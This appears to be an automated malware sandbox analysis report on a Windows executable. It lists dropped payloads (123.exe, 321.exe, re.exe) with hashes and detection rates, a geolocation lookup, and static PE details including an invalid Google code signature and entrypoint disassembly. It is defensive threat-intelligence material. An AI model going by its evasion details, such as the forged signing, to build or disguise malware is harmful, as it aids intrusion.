Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.7.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6096.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4669
Entropy (8bit):	4.450480432049602
Encrypted:	false
SSDEEP:	48:cvIwSD8zsLJgtWI9htWgc8sqYjn8fm8M4J+YGMFZ+q8vCGPeGR/xd:uITflGcgrsqYwJ+TkK1Pv/xd
MD5:	67A7DCAB90F2C19A8BA54CC51EEEBBE6
SHA1:	1C3CED4221BC3C471AC168314C82C4F3C89C1C4D
SHA-256:	E93C8382F14A04B45E6C75763DCA2BAD02880E58A8E2AE70B73DBBC513E8A68C
SHA-512:	B611F6B049BEB1EBC769FB073B3E91F83AD491A60DCD14E2868BCF61DA19F5C5396341217D0FE0314AA701A3225B1B26FCECC6F2BAF217678165D3FC5F55A981
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1967499" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER674C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8210
Entropy (8bit):	3.687159345617314
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi1p69/6YTg6ZRlgmfPSxboCpxr89biBsfN2m:RrlsNib6V6YU6ZRlgmfPS8i6fF
MD5:	1C05AA2532095539455207EBE118BC6B
SHA1:	0FC310372980C6ABB1DA42157DF417262274D78A
SHA-256:	8A27D94FB762C35110194751A120A7FC0C20A435F8660A8E7405AA787FF86AE4
SHA-512:	99B9637D7AE19EF088CB76DA2C4EF5807D2FFCE5CEC1DA1DFD8B3581953703201B369D5F53B15B805CF9E03EB872DDE52C847DDD9BD005D793533E62718EF107
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.1.7.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER67AB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4556
Entropy (8bit):	4.436847447702928
Encrypted:	false
SSDEEP:	48:cvIwSD8zsLJgtWI9htWgc8sqYj88fm8M4JTiFua+q8pOmP30XQd:uITflGcgrsqY1Jda1mP30XQd
MD5:	581422F784C144FC48C76BE042428DA8
SHA1:	057E998AE0D1431F6637B8773E7ACBE14F0A97E5
SHA-256:	BD7E9942BC1B5FCCF3D8C9B841595DA841CFBE8B1B0E070A36FCD004F16987C1
SHA-512:	183A3D94C34AEC1A0A297DD88B7D74C1F523AB22D5E2B8538C2E542EB2D871A2114EE7E965D5E851F432173B4EA63301549AB257981F59DBBD8F662A1A2F78F1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1967499" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\gggge[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	169
Entropy (8bit):	4.51833957423091
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGu:q43tISl6kXiMIWSU6XlI5LPtIpfGu
MD5:	84855C13836B389D5EC7CFD4C9266173
SHA1:	1CF3056FF23C4176FD7CA9816A000ED461D6D323
SHA-256:	502083C916AE481CDD413B8D93315300653DF5FB3DCC5770C01991DE19977EAE
SHA-512:	2479112004884D42D4FFE1174DC358C5D1B0FA2B41641D32F2FB67539C4F834D63CFBBF7E98C63B9A64E49B26390C410BB7E50F1AD4A755F32D081367AF05FCB
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[1].json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.517190359844184
Encrypted:	false
SSDEEP:	3:YWR4buWsyLBHm+aG9fQ8I5CMt6HUSTn:YWybuiTaGWjjKn
MD5:	E7726B15BF91A57C26ED4F9B234F6079
SHA1:	6E353458B87B39D6E20D32D118425366BF1AFD45
SHA-256:	842BE40F0954EA384C937EDD0AD6ABA84FB9D1C65630E4173134101C6535DE78
SHA-512:	F25D199209A05A01401515C7C3B27269D24D02C7CE100AF073A1BC8360CF8958AFA5656D6471A94F77E01CD138DF6BA5DB3CAB5112EB585A2FD30B8C111CCC28
Malicious:	false
Preview:	{"status":"success","countryCode":"CH","city":"Zurich","timezone":"Europe/Zurich","query":"84.17.52.40"}

C:\Users\user\AppData\Local\Temp\WER570F.tmp.WERDataCollectionStatus.txt

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	4758
Entropy (8bit):	3.2456623730606746
Encrypted:	false
SSDEEP:	96:pwpIiVkXkkXYkuguWo0Q10QB0Qgg0QXR0QNH0QC7XgbXdVszeuzSzbxGQI5hmQst:pIlZ+u+GDoeyOkNm
MD5:	B4E7C98E4D27C173EFD9AF4BAC7A7E02
SHA1:	A312431D123487E8A4246D5082C5FF030E4DF52D
SHA-256:	A27529B65563A30BE8CC665297A740160CC8AD274D2D7628069FD7DDA7FAACF7
SHA-512:	9DCAF1F2D6FF299F1AE2C68D7D7E90236F209FF394C99E6403C38EC14AB5891BE7C71705D8AD752EBD09EA83A4D9869F10CCAC9204FA5438662E99404A85BD13
Malicious:	false
Preview:	......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.7.8.4. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .5.4.4. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .7.0.0.7.7.7.5. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

C:\Users\user\AppData\Local\Temp\re.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	734533849
Entropy (8bit):	0.01398227363039217
Encrypted:	false
SSDEEP:
MD5:	4D628054BC9957C99A76147FF2D1FF0F
SHA1:	F4768265903C3AAB2C04475ACEFD973EE1A081B6
SHA-256:	53D0BC467AAD4AC95C9655617B34E3859D0BEBA1D80167B4E8A697AA0FEC0B3B
SHA-512:	2E01FDE9A007D9ACCECF63723594DF13415DC2C6B686D8301C4C0F9AD8E4BEA287837C1169E9232EE6122A1DEFC21BEF6F5AEC852969FAE4047F9917014B63BD
Malicious:	true
Joe Sandbox View:	Filename: 1JCAVkYU3U.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................$..........................@..........................p............@... .............................. ..T....P.......................`..\.................................................... ...............................text...............................`.P`.data...............................@.`..rdata..............................@.0@.bss..................................0..idata..T.... ......................@.0..CRT....4....0......................@.0..tls.........@......................@.0..rsrc........P......................@.0..reloc..\....`......................@.0B........................................................................................................................................................................................................................................................................

C:\Windows\Temp\123.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1169408
Entropy (8bit):	2.8265335873275688
Encrypted:	false
SSDEEP:	6144:xVl9ixhZ6vEg+MwgemkAO6mg1pjwDTD5dqwm:xVl9ix0TiomIjwb5Zm
MD5:	3D8A270AF27D26831957D97353600B05
SHA1:	92CAC4EF51296EC459A149DA3D1E0FEDF662C7F2
SHA-256:	D2A47AF584D0742AD90E05462B8745749BD61F1323EAEC2F657276C4A4CE367F
SHA-512:	6F02FE73BB9C85A703C818CF9CE5C39A84905248DD92569AA22AB364BB1D1F1A85152C092DC1EB53949B711C21392062B19E27F011F2E5847A48A0FF30AC0572
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38% Antivirus: Virustotal, Detection: 39%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................."........................................g........Rich............PE..L.....d............... .............R............@.......................................@.................................P...(...................................x...................................@...............0............................text...F........................... ..`.rdata..(...........................@..@.data...............................@....rsrc................~..............@..@.reloc..............................@..B.anoth...<.......>..................`. .........................................................................................................................................................................................................................................................................

C:\Windows\Temp\321.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2041856
Entropy (8bit):	5.3819930082959
Encrypted:	false
SSDEEP:	24576:NVhwE9aMzxhtfET6oKlFLg+T7XyCraWCZM2:RweaCxoGoKlFc+/yCraWCZM
MD5:	3E4A296272D9389DB0A87A3723512815
SHA1:	26DD4772006F70D118342203F0E718D270180743
SHA-256:	F66721CC089E6DF528A57FBDAB4B3E7576B0ED0E4071B87D861E4016BEBA130F
SHA-512:	4061592A08814A25BCEBD0869D82E9531C40A6A61D5AFB17E6D263C0B59D9E6F31A07027FBE565EE32987AF5E600724222F319CCCE54A2D91C7890C94CCFA44A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 35% Antivirus: Virustotal, Detection: 38%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................."........................................g........Rich............PE..L.....d............... .....0.......R............@..........................`............@.................................P...(.......................................................................@...............0............................text...F........................... ..`.rdata..(...........................@..@.data..../.......$..................@....rsrc...............................@..@.reloc..............................@..B.anoth...<... ...>..................`. .........................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.292317510158469
Encrypted:	false
SSDEEP:	12288:/EVkOVXJ1MkvYJIfaxKUKJLmK/kbH/t2kRDxkkRdzpwKwIZRRlOmBZM:ukOVXJ1MkvYJIfxvs
MD5:	C6E1B237B55E7D81AA406AFD3AA3C229
SHA1:	DF126685EDE9BB6D289A4CF24B674F601BA63462
SHA-256:	E7EC73FAA50A9E4B2E0AB1727053083EAD975717F088A13237BF12EC10DE7632
SHA-512:	36A4D7629CB91A6D37D75FEA5C17149AAFFF15748B1E4926B7C96DCBEDEAE8CC3D535B872403762493606206EB8B265795150F28CFAFF4FE7162D9ED07217C61
Malicious:	false
Preview:	regfj...j...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&.c..^...............................................................................................................................................................................................................................................................................................................................................jP........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.9047106410462624
Encrypted:	false
SSDEEP:	768:1M/7xkmtLxMOjEHftx1dJ4J2HFgJ48qkvpmkqYpSC92KMYFL+er/:Yxrt9u1Hqk
MD5:	FBEB2E4FDEC6D17722B4F6BCAEF09DED
SHA1:	DFE9ABDE0DDBCA74C09BEAC705EA80DEAB6C21E4
SHA-256:	CD8601F630A311358EFE0B5EF31588F1242D22723BD222DC90CCFCA37D57AC9D
SHA-512:	C4CA254DCAF478DF2B7EDFB9D46B569A93E96AB1378FD87B3F77E78B76353BA8627CE65F66696511CCBD34AF3030753EA681C18561BA7B0433CFCCF51B20498D
Malicious:	false
Preview:	regfi...i...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&.c..^................................................................................................................................................................................................................................................................................................................................................jPHvLE.~......i.............i. {f....,./..........@.......0...................0..hbin................p.\..,..........nk,..Fm..^.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..o..^...... ........................... .......Z.......................Root........lf......Root....nk ..o..^...................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissions

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.807476032983981
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1180505
MD5:	308d76f827d8624c5c933a5119569b5e
SHA1:	e896674ff83456092db4763c8b02537ec5f60296
SHA256:	c42840af07ce02effd645b993cbee380d20e097ed2bd1e68468624766b0601b2
SHA512:	22c5c55f12b6df035d7065a0d2aebd69a488cf9c9def138cedd78096afb1c7ea8f3e727ad03660485fe72f1aa34644de099115f83276ffbf1b68ea932e965644
SSDEEP:	24576:KTbBv5rUlIpnVUovouyHWiyk9AGeC/v5ZsqD/:8BRplv5rkxvM0
TLSH:	A0451203BDC6E9B2D51208331958AB51993DBE201FA58EEFB3D83B1DD6611D0E7313A6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	d49494d6c88ecec2

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	11/7/2019 4:00:00 PM 11/16/2022 4:00:00 AM
Subject Chain	CN=Google LLC, O=Google LLC, L=Mountain View, S=California, C=US
Version:	3
Thumbprint MD5:	463BFA4FA69A9E6C4D8813CCFAAF16EE
Thumbprint SHA-1:	A3958AE522F3C54B878B20D7B0F63711E08666B2
Thumbprint SHA-256:	5F2F2840C6E51D17F09334ADA05D9DCDD9AEEB11AF0AE163816757D539ABE3EE
Serial:	06AEA76BAC46A9E8CFE6D29E45AAF033

Entrypoint Preview

Instruction
call 00007EFCC0A117EBh
jmp 00007EFCC0A110FDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007EFCC0A03F47h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007EFCC0A1458Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007EFCC0A1128Ch
push 0000000Ch
push esi
call 00007EFCC0A10849h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007EFCC0A03EC2h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007EFCC0A14049h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007EFCC0A11208h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007EFCC0A1402Ch
int3
jmp 00007EFCC0A15AC7h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xe050	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x119d91	0x65c8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x73000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xe050	0xe200	False	0.6343853705752213	data	6.802173495258787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x73000	0x233c	0x2400	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
PNG	0x64644	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced
PNG	0x6518c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced
RT_ICON	0x66738	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors
RT_ICON	0x66ca0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors
RT_ICON	0x67548	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors
RT_ICON	0x683f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m
RT_ICON	0x68858	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m
RT_ICON	0x69900	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m
RT_ICON	0x6bea8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_DIALOG	0x6fc1c	0x2ba	data
RT_DIALOG	0x6fed8	0x13a	data
RT_DIALOG	0x70014	0xf2	data
RT_DIALOG	0x70108	0x14a	data
RT_DIALOG	0x70254	0x314	data
RT_DIALOG	0x70568	0x24a	data
RT_STRING	0x707b4	0x1fc	data
RT_STRING	0x709b0	0x246	data
RT_STRING	0x70bf8	0x1a6	data
RT_STRING	0x70da0	0xdc	data
RT_STRING	0x70e7c	0x47c	data
RT_STRING	0x712f8	0x164	data
RT_STRING	0x7145c	0x110	data
RT_STRING	0x7156c	0x158	data
RT_STRING	0x716c4	0xe8	data
RT_STRING	0x717ac	0xe6	data
RT_GROUP_ICON	0x71894	0x68	data
RT_MANIFEST	0x718fc	0x753	XML 1.0 document, ASCII text, with CRLF line terminators

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, 